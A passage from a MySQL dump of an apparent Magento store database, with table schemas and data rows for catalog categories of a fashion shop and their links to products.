04:24:51','1/2/13/17',4,3,0),(18,3,13,'2020-06-05 04:25:37','2020-07-18 05:23:32','1/2/13/18',5,3,0),(19,3,13,'2020-06-05 04:27:48','2020-06-05 04:27:48','1/2/13/19',6,3,0),(20,3,13,'2020-06-05 04:28:09','2020-06-05 04:28:09','1/2/13/20',7,3,0),(21,3,13,'2020-06-05 04:28:32','2020-06-05 04:28:32','1/2/13/21',8,3,0),(22,3,13,'2020-07-02 13:20:51','2020-07-02 13:22:16','1/2/13/22',9,3,0),(24,3,13,'2020-07-02 13:22:47','2020-07-18 05:25:04','1/2/13/24',10,3,0),(25,3,13,'2020-07-02 13:23:36','2020-07-02 13:23:36','1/2/13/25',11,3,0);

--
-- Table structure for table `catalog_category_entity_datetime`
--

CREATE TABLE `catalog_category_entity_datetime` (
  `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID',
  `attribute_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Value',
  PRIMARY KEY (`value_id`),
  UNIQUE KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ENTITY_ID` (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DATETIME_ATTRIBUTE_ID` (`attribute_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DATETIME_STORE_ID` (`store_id`),
  CONSTRAINT `CATALOG_CATEGORY_ENTITY_DATETIME_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_DTIME_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_DTIME_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Datetime Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_datetime`
--

INSERT INTO `catalog_category_entity_datetime` VALUES (1,61,0,6,NULL),(2,62,0,6,NULL),(3,61,0,3,NULL),(4,62,0,3,NULL),(5,61,0,4,NULL),(6,62,0,4,NULL),(7,61,0,12,NULL),(8,62,0,12,NULL),(9,61,0,5,NULL),(10,62,0,5,NULL),(11,61,0,14,NULL),(12,62,0,14,NULL),(13,61,0,22,NULL),(14,62,0,22,NULL),(15,61,0,18,NULL),(16,62,0,18,NULL),(17,61,0,24,NULL),(18,62,0,24,NULL);

--
-- Table structure for table `catalog_category_entity_decimal`
--

CREATE TABLE `catalog_category_entity_decimal` (
  `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID',
  `attribute_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(20,6) DEFAULT NULL COMMENT 'Value',
  PRIMARY KEY (`value_id`),
  UNIQUE KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ENTITY_ID` (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_ATTRIBUTE_ID` (`attribute_id`),
  KEY `CATALOG_CATEGORY_ENTITY_DECIMAL_STORE_ID` (`store_id`),
  CONSTRAINT `CATALOG_CATEGORY_ENTITY_DECIMAL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_DEC_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_DEC_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Decimal Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_decimal`
--


--
-- Table structure for table `catalog_category_entity_int`
--

CREATE TABLE `catalog_category_entity_int` (
  `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID',
  `attribute_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) DEFAULT NULL COMMENT 'Value',
  PRIMARY KEY (`value_id`),
  UNIQUE KEY `CATALOG_CATEGORY_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  KEY `CATALOG_CATEGORY_ENTITY_INT_ENTITY_ID` (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_INT_ATTRIBUTE_ID` (`attribute_id`),
  KEY `CATALOG_CATEGORY_ENTITY_INT_STORE_ID` (`store_id`),
  CONSTRAINT `CATALOG_CATEGORY_ENTITY_INT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_INT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_INT_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=174 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Integer Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_int`
--

INSERT INTO `catalog_category_entity_int` VALUES (1,69,0,1,1),(2,46,0,2,1),(3,69,0,2,1),(4,46,0,3,1),(5,54,0,3,1),(6,69,0,3,1),(7,70,0,3,0),(8,71,0,3,0),(9,140,0,3,1),(10,141,0,3,1),(11,46,0,4,1),(12,54,0,4,1),(13,69,0,4,1),(14,70,0,4,0),(15,71,0,4,0),(16,140,0,4,1),(17,141,0,4,1),(18,46,0,5,1),(19,54,0,5,1),(20,69,0,5,1),(21,70,0,5,0),(22,71,0,5,0),(23,140,0,5,1),(24,141,0,5,1),(25,46,0,6,1),(26,54,0,6,1),(27,69,0,6,1),(28,70,0,6,0),(29,71,0,6,0),(30,140,0,6,1),(31,141,0,6,1),(32,53,0,6,NULL),(33,46,0,7,1),(34,54,0,7,1),(35,69,0,7,1),(36,70,0,7,0),(37,71,0,7,0),(38,140,0,7,1),(39,141,0,7,1),(40,46,0,8,1),(41,54,0,8,1),(42,69,0,8,1),(43,70,0,8,0),(44,71,0,8,0),(45,140,0,8,1),(46,141,0,8,1),(47,46,0,9,1),(48,54,0,9,1),(49,69,0,9,1),(50,70,0,9,0),(51,71,0,9,0),(52,140,0,9,1),(53,141,0,9,1),(61,53,0,3,NULL),(62,53,0,4,NULL),(63,46,0,11,1),(64,54,0,11,1),(65,69,0,11,1),(66,70,0,11,0),(67,71,0,11,0),(68,140,0,11,1),(69,141,0,11,1),(70,46,0,12,1),(71,54,0,12,1),(72,69,0,12,1),(73,70,0,12,0),(74,71,0,12,0),(75,140,0,12,0),(76,141,0,12,0),(77,53,0,12,NULL),(78,46,0,13,1),(79,54,0,13,1),(80,69,0,13,0),(81,70,0,13,0),(82,71,0,13,0),(83,140,0,13,1),(84,141,0,13,1),(85,46,0,14,1),(86,54,0,14,1),(87,69,0,14,0),(88,70,0,14,0),(89,71,0,14,0),(90,140,0,14,1),(91,141,0,14,1),(92,46,0,15,1),(93,54,0,15,1),(94,69,0,15,0),(95,70,0,15,0),(96,71,0,15,0),(97,140,0,15,1),(98,141,0,15,1),(99,46,0,16,1),(100,54,0,16,1),(101,69,0,16,0),(102,70,0,16,0),(103,71,0,16,0),(104,140,0,16,1),(105,141,0,16,1),(106,46,0,17,1),(107,54,0,17,1),(108,69,0,17,0),(109,70,0,17,0),(110,71,0,17,0),(111,140,0,17,1),(112,141,0,17,1),(113,46,0,18,1),(114,54,0,18,1),(115,69,0,18,0),(116,70,0,18,0),(117,71,0,18,0),(118,140,0,18,1),(119,141,0,18,1),(120,46,0,19,1),(121,54,0,19,1),(122,69,0,19,0),(123,70,0,19,0),(124,71,0,19,0),(125,140,0,19,1),(126,141,0,19,1),(127,46,0,20,1),(128,54,0,20,1),(129,69,0,20,0),(130,70,0,20,0),(131,71,0,20,0),(132,140,0,20,1),(133,141,0,20,1),(134,46,0,21,1),(135,54,0,21,1),(136,69,0,21,0),(137,70,0,21,0),(138,71,0,21,0),(139,140,0,21,1),(140,141,0,21,1),(141,53,0,5,NULL),(142,53,0,14,NULL),(143,46,0,22,1),(144,54,0,22,1),(145,69,0,22,1),(146,70,0,22,0),(147,71,0,22,0),(148,140,0,22,1),(149,141,0,22,1),(150,53,0,22,NULL),(158,46,0,24,1),(159,54,0,24,1),(160,69,0,24,1),(161,70,0,24,0),(162,71,0,24,0),(163,140,0,24,1),(164,141,0,24,1),(165,46,0,25,1),(166,54,0,25,1),(167,69,0,25,1),(168,70,0,25,0),(169,71,0,25,0),(170,140,0,25,1),(171,141,0,25,1),(172,53,0,18,NULL),(173,53,0,24,NULL);

--
-- Table structure for table `catalog_category_entity_text`
--

CREATE TABLE `catalog_category_entity_text` (
  `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID',
  `attribute_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` mediumtext DEFAULT NULL COMMENT 'Value',
  PRIMARY KEY (`value_id`),
  UNIQUE KEY `CATALOG_CATEGORY_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  KEY `CATALOG_CATEGORY_ENTITY_TEXT_ENTITY_ID` (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`),
  KEY `CATALOG_CATEGORY_ENTITY_TEXT_STORE_ID` (`store_id`),
  CONSTRAINT `CATALOG_CATEGORY_ENTITY_TEXT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_TEXT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_TEXT_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=37 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Text Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_text`
--

INSERT INTO `catalog_category_entity_text` VALUES (1,47,0,6,NULL),(2,50,0,6,NULL),(3,51,0,6,NULL),(4,64,0,6,NULL),(5,47,0,3,NULL),(6,50,0,3,NULL),(7,51,0,3,NULL),(8,64,0,3,NULL),(9,47,0,4,NULL),(10,50,0,4,NULL),(11,51,0,4,NULL),(12,64,0,4,NULL),(13,47,0,12,NULL),(14,50,0,12,NULL),(15,51,0,12,NULL),(16,64,0,12,NULL),(17,47,0,5,NULL),(18,50,0,5,NULL),(19,51,0,5,NULL),(20,64,0,5,NULL),(21,47,0,14,NULL),(22,50,0,14,NULL),(23,51,0,14,NULL),(24,64,0,14,NULL),(25,47,0,22,NULL),(26,50,0,22,NULL),(27,51,0,22,NULL),(28,64,0,22,NULL),(29,47,0,18,NULL),(30,50,0,18,NULL),(31,51,0,18,NULL),(32,64,0,18,NULL),(33,47,0,24,NULL),(34,50,0,24,NULL),(35,51,0,24,NULL),(36,64,0,24,NULL);

--
-- Table structure for table `catalog_category_entity_varchar`
--

CREATE TABLE `catalog_category_entity_varchar` (
  `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID',
  `attribute_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value',
  PRIMARY KEY (`value_id`),
  UNIQUE KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ENTITY_ID` (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_ATTRIBUTE_ID` (`attribute_id`),
  KEY `CATALOG_CATEGORY_ENTITY_VARCHAR_STORE_ID` (`store_id`),
  CONSTRAINT `CATALOG_CATEGORY_ENTITY_VARCHAR_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_VCHR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_ENTT_VCHR_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=126 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Varchar Attribute Backend Table';

--
-- Dumping data for table `catalog_category_entity_varchar`
--

INSERT INTO `catalog_category_entity_varchar` VALUES (1,45,0,1,'Root Catalog'),(2,45,0,2,'Default Category'),(3,52,0,2,'PRODUCTS'),(4,45,0,3,'Hot Selling'),(5,52,0,3,'PRODUCTS'),(6,119,0,3,'hot-selling'),(7,120,0,3,'unofficial/hot-selling'),(8,45,0,4,'Cocktail'),(9,52,0,4,'PRODUCTS'),(10,119,0,4,'cocktail'),(11,120,0,4,'unofficial/cocktail'),(12,45,0,5,'Festive Wear'),(13,52,0,5,'PRODUCTS'),(14,119,0,5,'festive-wear'),(15,120,0,5,'unofficial/festive-wear'),(16,45,0,6,'Unofficial'),(17,52,0,6,'PRODUCTS_AND_PAGE'),(18,119,0,6,'unofficial'),(19,120,0,6,'unofficial'),(21,49,0,6,NULL),(22,60,0,6,NULL),(23,63,0,6,NULL),(24,45,0,7,'Dressy Casual'),(25,52,0,7,'PRODUCTS'),(26,119,0,7,'dressy-casual'),(27,120,0,7,'unofficial/dressy-casual'),(28,45,0,8,'Runway'),(29,52,0,8,'PRODUCTS'),(30,119,0,8,'runway'),(31,120,0,8,'runway'),(32,45,0,9,'Premium'),(33,52,0,9,'PRODUCTS'),(34,119,0,9,'premium'),(35,120,0,9,'premium'),(40,49,0,3,NULL),(41,60,0,3,NULL),(42,63,0,3,NULL),(43,49,0,4,NULL),(44,60,0,4,NULL),(45,63,0,4,NULL),(46,45,0,11,'London Fashion Week'),(47,52,0,11,'PRODUCTS'),(48,119,0,11,'london-fashion-week'),(49,120,0,11,'london-fashion-week'),(50,45,0,12,'CLUB'),(51,52,0,12,'PRODUCTS'),(52,119,0,12,'dti-club'),(53,120,0,12,'unofficial/dti-club'),(54,49,0,12,NULL),(55,60,0,12,NULL),(56,63,0,12,NULL),(57,45,0,13,'SWATI MISHRA'),(58,52,0,13,'PRODUCTS'),(59,119,0,13,'swati-mishra'),(60,120,0,13,'swati-mishra'),(61,45,0,14,'Spring Summer 20'),(62,52,0,14,'PRODUCTS'),(63,119,0,14,'spring-summer-20'),(64,120,0,14,'swati-mishra/spring-summer-20'),(65,45,0,15,'Shop S/S\'20'),(66,52,0,15,'PRODUCTS'),(67,119,0,15,'shop-s-s-20'),(68,120,0,15,'swati-mishra/shop-s-s-20'),(69,45,0,16,'Shop SM Dresses'),(70,52,0,16,'PRODUCTS'),(71,119,0,16,'shop-sm-dresses'),(72,120,0,16,'swati-mishra/shop-sm-dresses'),(73,45,0,17,'Fall Winter 19'),(74,52,0,17,'PRODUCTS'),(75,119,0,17,'fall-winter-19'),(76,120,0,17,'swati-mishra/fall-winter-19'),(77,45,0,18,'Shop F/W\'19'),(78,52,0,18,'PRODUCTS'),(79,119,0,18,'shop-f-w-19'),(80,120,0,18,'swati-mishra/shop-f-w-19'),(81,45,0,19,'Shop Jackets'),(82,52,0,19,'PRODUCTS'),(83,119,0,19,'shop-jackets'),(84,120,0,19,'swati-mishra/shop-jackets'),(85,45,0,20,'Watch S/S\'20 Show'),(86,52,0,20,'PRODUCTS'),(87,119,0,20,'watch-s-s-20-show'),(88,120,0,20,'swati-mishra/watch-s-s-20-show'),(89,45,0,21,'Watch F/W\'19 Show'),(90,52,0,21,'PRODUCTS'),(91,119,0,21,'watch-f-w-19-show'),(92,120,0,21,'swati-mishra/watch-f-w-19-show'),(95,49,0,5,NULL),(96,60,0,5,NULL),(97,63,0,5,NULL),(98,49,0,14,NULL),(99,60,0,14,NULL),(100,63,0,14,NULL),(101,45,0,22,'Fall Winter 18'),(102,52,0,22,'PRODUCTS'),(103,119,0,22,'fall-winter-18'),(104,120,0,22,'swati-mishra/fall-winter-18'),(105,49,0,22,NULL),(106,60,0,22,NULL),(107,63,0,22,NULL),(112,45,0,24,'Shop F/W\'18'),(113,52,0,24,'PRODUCTS'),(114,119,0,24,'shop-f-w-18'),(115,120,0,24,'swati-mishra/shop-f-w-18'),(116,45,0,25,'Watch F/W\'18 Show'),(117,52,0,25,'PRODUCTS'),(118,119,0,25,'watch-f-w-18-show'),(119,120,0,25,'swati-mishra/watch-f-w-18-show'),(120,49,0,18,NULL),(121,60,0,18,NULL),(122,63,0,18,NULL),(123,49,0,24,NULL),(124,60,0,24,NULL),(125,63,0,24,NULL);

--
-- Table structure for table `catalog_category_product`
--

CREATE TABLE `catalog_category_product` (
  `entity_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `category_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Category ID',
  `product_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position',
  PRIMARY KEY (`entity_id`,`category_id`,`product_id`),
  UNIQUE KEY `CATALOG_CATEGORY_PRODUCT_CATEGORY_ID_PRODUCT_ID` (`category_id`,`product_id`),
  KEY `CATALOG_CATEGORY_PRODUCT_PRODUCT_ID` (`product_id`),
  CONSTRAINT `CAT_CTGR_PRD_CTGR_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`category_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE,
  CONSTRAINT `CAT_CTGR_PRD_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=2079 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Product To Category Linkage Table';

--
-- Dumping data for table `catalog_category_product`
--

INSERT INTO `catalog_category_product` VALUES (486,5,219,0),(487,5,220,0),(488,5,221,0),(489,5,222,0),(490,5,223,0),(491,5,224,0),(492,5,225,0),(493,5,226,0),(494,5,227,0),(495,5,228,0),(496,5,229,0),(497,5,230,0),(498,5,231,0),(499,5,232,0),(500,5,233,0),(501,5,234,0),(502,5,235,0),(503,5,236,0),(504,5,237,0),(505,5,238,0),(506,5,239,0),(507,5,240,0),(508,5,241,0),(509,5,242,0),(510,5,243,0),(511,5,244,0),(512,5,245,0),(513,5,246,0),(514,5,247,0),(515,5,248,0),(516,5,249,0),(517,5,250,0),(518,5,251,0),(519,5,252,0),(520,5,253,0),(521,5,254,0),(522,5,255,0),(523,5,256,0),(524,5,257,0),(525,5,258,0),(526,5,259,0),(527,5,260,0),(528,5,261,0),(529,5,262,0),(530,5,263,0),(531,5,264,0),(532,5,265,0),(533,5,266,0),(534,5,267,0),(535,5,268,0),(536,3,268,0),(537,5,269,0),(538,3,269,0),(539,5,270,0),(540,3,270,0),(541,5,271,0),(542,3,271,0),(543,5,272,0),(544,3,272,0),(545,5,273,0),(546,3,273,0),(547,5,274,0),(548,3,274,0),(549,5,275,0),(550,3,275,0),(551,5,276,0),(552,3,276,0),(553,5,277,0),(554,3,277,0),(555,5,278,0),(556,3,278,0),(557,5,279,0),(558,3,279,0),(559,5,280,0),(560,3,280,0),(561,5,281,0),(562,3,281,0),(563,5,282,0),(564,3,282,0),(565,5,283,0),(566,3,283,0),(567,5,284,0),(568,3,284,0),(569,5,285,0),(570,3,285,0),(571,5,286,0),(572,5,287,0),(573,5,288,0),(574,5,289,0),(575,5,290,0),(576,5,291,0),(577,5,292,0),(578,5,293,0),(579,5,294,0),(580,5,295,0),(581,3,295,0),(582,5,296,0),(583,3,296,0),(584,5,297,0),(585,3,297,0),(586,5,298,0),(587,3,298,0),(588,5,299,0),(589,3,299,0),(590,5,300,0),(591,3,300,0),(592,5,301,0),(593,3,301,0),(594,5,302,0),(595,3,302,0),(596,5,303,0),(597,3,303,0),(598,5,304,0),(599,3,304,0),(600,5,305,0),(601,3,305,0),(602,5,306,0),(603,3,306,0),(604,5,307,0),(605,3,307,0),(606,5,308,0),(607,3,308,0),(608,5,309,0),(609,3,309,0),(610,5,310,0),(611,3,310,0),(612,5,311,0),(613,3,311,0),(614,5,312,0),(615,3,312,0),(616,5,313,0),(617,3,313,0),(618,5,314,0),(619,3,314,0),(620,5,315,0),(621,3,315,0),(622,5,316,0),(623,3,316,0),(624,5,317,0),(625,3,317,0),(626,5,318,0),(627,3,318,0),(628,5,319,0),(629,3,319,0),(630,5,320,0),(631,3,320,0),(632,5,321,0),(633,3,321,0),(634,4,322,0),(635,3,322,0),(636,4,323,0),(637,3,323,0),(638,4,324,0),(639,3,324,0),(640,4,325,0),(641,3,325,0),(642,4,326,0),(643,3,326,0),(644,4,327,0),(645,3,327,0),(646,4,328,0),(647,3,328,0),(648,4,329,0),(649,3,329,0),(650,4,330,0),(651,3,330,0),(652,4,331,0),(653,4,332,0),(654,4,333,0),(655,4,334,0),(656,4,335,0),(657,4,336,0),(658,4,337,0),(659,4,338,0),(660,4,339,0),(661,4,340,0),(662,4,341,0),(663,4,342,0),(664,4,343,0),(665,4,344,0),(666,4,345,0),(667,4,346,0),(668,4,347,0),(669,4,348,0),(670,4,349,0),(671,3,349,0),(672,4,350,0),(673,3,350,0),(674,4,351,0),(675,3,351,0),(676,4,352,0),(677,3,352,0),(678,4,353,0),(679,3,353,0),(680,4,354,0),(681,3,354,0),(682,4,355,0),(683,3,355,0),(684,4,356,0),(685,3,356,0),(686,4,357,0),(687,3,357,0),(688,4,358,0),(689,4,359,0),(690,4,360,0),(691,4,361,0),(692,4,362,0),(693,4,363,0),(694,4,364,0),(695,4,365,0),(696,4,366,0),(697,4,367,0),(698,4,368,0),(699,4,369,0),(700,4,370,0),(701,4,371,0),(702,4,372,0),(703,4,373,0),(704,4,374,0),(705,4,375,0),(706,4,376,0),(707,4,377,0),(708,4,378,0),(709,4,379,0),(710,4,380,0),(711,4,381,0),(712,4,382,0),(713,4,383,0),(714,4,384,0),(715,4,385,0),(716,4,386,0),(717,4,387,0),(718,4,388,0),(719,4,389,0),(720,4,390,0),(721,4,391,0),(722,4,392,0),(723,4,393,0),(724,4,394,0),(725,4,395,0),(726,4,396,0),(727,4,397,0),(728,4,398,0),(729,4,399,0),(730,4,400,0),(731,4,401,0),(732,4,402,0),(733,4,403,0),(734,4,404,0),(735,4,405,0),(736,4,406,0),(737,4,407,0),(738,4,408,0),(739,4,409,0),(740,4,410,0),(741,4,411,0),(742,3,411,0),(743,4,412,0),(744,3,412,0),(745,4,413,0),(746,3,413,0),(747,4,414,0),(748,3,414,0),(749,4,415,0),(750,3,415,0),(751,4,416,0),(752,3,416,0),(753,4,417,0),(754,3,417,0),(755,4,418,0),(756,3,418,0),(757,4,419,0),(758,3,419,0),(759,4,420,0),(760,3,420,0),(761,4,421,0),(762,3,421,0),(763,4,422,0),(764,3,422,0),(765,4,423,0),(766,3,423,0),(767,4,424,0),(768,3,424,0),(769,4,425,0),(770,3,425,0),(771,4,426,0),(772,3,426,0),(773,4,427,0),(774,3,427,0),(775,4,428,0),(776,3,428,0),(777,4,429,0),(778,4,430,0),(779,4,431,0),(780,4,432,0),(781,4,433,0),(782,4,434,0),(783,4,435,0),(784,4,436,0),(785,4,437,0),(786,4,438,0),(787,4,439,0),(788,4,440,0),(789,4,441,0),(790,4,442,0),(791,4,443,0),(792,4,444,0),(793,4,445,0),(794,4,446,0),(795,4,447,0),(796,4,448,0),(797,4,449,0),(798,4,450,0),(799,4,451,0),(800,4,452,0),(801,4,453,0),(802,4,454,0),(803,4,455,0),(804,4,456,0),(805,4,457,0),(806,4,458,0),(807,4,459,0),(808,4,460,0),(809,4,461,0),(810,4,462,0),(811,4,463,0),(812,4,464,0),(813,7,465,0),(814,3,465,0),(815,7,466,0),(816,3,466,0),(817,7,467,0),(818,3,467,0),(819,7,468,0),(820,3,468,0),(821,7,469,0),(822,3,469,0),(823,7,470,0),(824,3,470,0),(825,7,471,0),(826,3,471,0),(827,7,472,0),(828,3,472,0),(829,7,473,0),(830,3,473,0),(831,7,474,0),(832,3,474,0),(833,7,475,0),(834,3,475,0),(835,7,476,0),(836,3,476,0),(837,7,477,0),(838,3,477,0),(839,7,478,0),(840,3,478,0),(841,7,479,0),(842,3,479,0),(843,7,480,0),(844,3,480,0),(845,7,481,0),(846,3,481,0),(847,7,482,0),(848,3,482,0),(849,7,483,0),(850,3,483,0),(851,7,484,0),(852,3,484,0),(853,7,485,0),(854,3,485,0),(855,7,486,0),(856,3,486,0),(857,7,487,0),(858,3,487,0),(859,7,488,0),(860,3,488,0),(861,7,489,0),(862,3,489,0),(863,7,490,0),(864,3,490,0),(865,7,491,0),(866,3,491,0),(867,7,492,0),(868,3,492,0),(869,7,493,0),(870,3,493,0),(871,7,494,0),(872,3,494,0),(873,7,495,0),(874,3,495,0),(875,7,496,0),(876,3,496,0),(877,7,497,0),(878,3,497,0),(879,7,498,0),(880,3,498,0),(881,7,499,0),(882,3,499,0),(883,7,500,0),(884,3,500,0),(885,7,501,0),(886,3,501,0),(887,7,502,0),(888,3,502,0),(889,7,503,0),(890,3,503,0),(891,7,504,0),(892,3,504,0),(893,7,505,0),(894,3,505,0),(895,7,506,0),(896,3,506,0),(897,7,507,0),(898,3,507,0),(899,7,508,0),(900,3,508,0),(901,7,509,0),(902,3,509,0),(903,7,510,0),(904,3,510,0),(905,7,511,0),(906,3,511,0),(907,7,512,0),(908,3,512,0),(909,7,513,0),(910,3,513,0),(911,7,514,0),(912,3,514,0),(913,7,515,0),(914,3,515,0),(915,7,516,0),(916,3,516,0),(917,7,517,0),(918,3,517,0),(919,7,518,0),(920,3,518,0),(921,7,519,0),(922,3,519,0),(923,7,520,0),(924,3,520,0),(925,7,521,0),(926,3,521,0),(927,7,522,0),(928,3,522,0),(929,7,523,0),(930,3,523,0),(931,7,524,0),(932,3,524,0),(933,7,525,0),(934,3,525,0),(935,7,526,0),(936,3,526,0),(937,7,527,0),(938,3,527,0),(939,7,528,0),(940,3,528,0),(941,7,529,0),(942,3,529,0),(943,7,530,0),(944,3,530,0),(945,7,531,0),(946,3,531,0),(947,7,532,0),(948,3,532,0),(949,7,533,0),(950,3,533,0),(951,7,534,0),(952,3,534,0),(953,7,535,0),(954,3,535,0),(955,7,536,0),(956,3,536,0),(957,7,537,0),(958,3,537,0),(959,7,538,0),(960,3,538,0),(961,7,539,0),(962,3,539,0),(963,7,540,0),(964,3,540,0),(965,7,541,0),(966,3,541,0),(967,7,542,0),(968,3,542,0),(969,7,543,0),(970,3,543,0),(971,7,544,0),(972,3,544,0),(973,7,545,0),(974,3,545,0),(975,7,546,0),(976,3,546,0),(977,7,547,0),(978,3,547,0),(979,7,548,0),(980,3,548,0),(981,7,549,0),(982,3,549,0),(983,7,550,0),(984,3,550,0),(985,7,551,0),(986,3,551,0),(987,7,552,0),(988,3,552,0),(989,7,553,0),(990,3,553,0),(991,7,554,0),(992,3,554,0),(993,7,555,0),(994,7,556,0),(995,7,557,0),(996,7,558,0),(997,7,559,0),(998,7,560,0),(999,7,561,0),(1000,7,562,0),(1001,7,563,0),(1002,7,564,0),(1003,7,565,